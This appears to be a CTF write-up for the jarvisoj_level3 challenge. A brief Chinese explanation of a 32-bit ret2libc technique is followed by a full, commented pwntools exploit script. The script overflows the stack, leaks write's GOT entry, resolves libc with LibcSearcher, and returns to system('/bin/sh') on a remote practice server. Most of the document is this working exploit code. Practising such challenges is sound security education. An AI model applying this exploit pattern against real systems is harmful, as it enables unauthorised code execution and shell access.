
pwn | jarvisoj_level3

x86 ret2libc

非常常规的 ret2libc：程序地址固定（无 PIE），先利用栈溢出把返回地址改成 write@plt，借 write(1, &GOT[write], 4) 泄露 write 在 libc 中的真实地址并据此算出 libc 基址，然后返回 main 再次触发溢出，第二次直接返回到 system("/bin/sh")。

exp:

from pwn import *
from LibcSearcher.LibcSearcher import *

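context.log_level = 'debug'

elf = ELF('./level3')
context.binary = elf  # pins arch/bits to the target (i386) for p32/u32 and friends
# Alternative when the remote libc build is known:
#   libc = ELF('./libc-2.23.so')
# In that case use libc.symbols['write'], libc.symbols['system'] and
# next(libc.search(b'/bin/sh')) instead of the libc.dump(...) calls below;
# ELF objects have no dump() method.

# main() of the non-PIE binary. It serves as write()'s fake return address so
# the program loops back to the vulnerable read() and we get a second overflow.
p_main = 0x08048484
p_plt_write = elf.plt['write']
p_got_write = elf.got['write']


# p = process('./level3')
p = remote('node4.buuoj.cn', 26805)

p.recvuntil(b'Input:\n')

# Stage 1: leak the runtime address of write() by calling
#   write(1, &GOT[write], 4)
# 32-bit cdecl frame after the overflow:
#   padding (0x88 buffer + 4 saved ebp) | write@plt | ret -> main | fd=1 | buf=GOT[write] | count=4
payload = b'M' * (0x88 + 4)
payload += p32(p_plt_write) + p32(p_main)
payload += p32(1) + p32(p_got_write) + p32(4)

p.send(payload)

# recvn() blocks until exactly 4 bytes have arrived. recv(4) may return fewer
# bytes on a slow link, and u32() would then raise on the short buffer.
addr = u32(p.recvn(4))

print(hex(addr))

# LibcSearcher matches on the low 12 bits of the leaked address; if several
# libc builds match it may prompt for a choice, so keep an eye on the output.
libc = LibcSearcher('write', addr)
p_libc_write = libc.dump('write')
p_libc_base = addr - p_libc_write
# libc is mmap()ed page-aligned; non-zero low 12 bits mean the offsets came
# from the wrong libc build and system/"/bin/sh" below would be garbage.
if p_libc_base & 0xfff:
    log.warning(f'libc base {p_libc_base:#x} is not page-aligned; '
                'LibcSearcher probably selected the wrong libc build')
p_system = p_libc_base + libc.dump('system')
p_binsh = p_libc_base + libc.dump('str_bin_sh')

p.recvuntil(b'Input:\n')

# Stage 2: back in main(), overwrite the return address with system() and pass
# "/bin/sh" as its first argument. The 4-byte filler is system()'s fake return
# address; the process is simply left to crash once the shell exits.
payload = b'M' * (0x88 + 4) + p32(p_system) + b'Mz11' + p32(p_binsh)
p.send(payload)
p.interactive()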

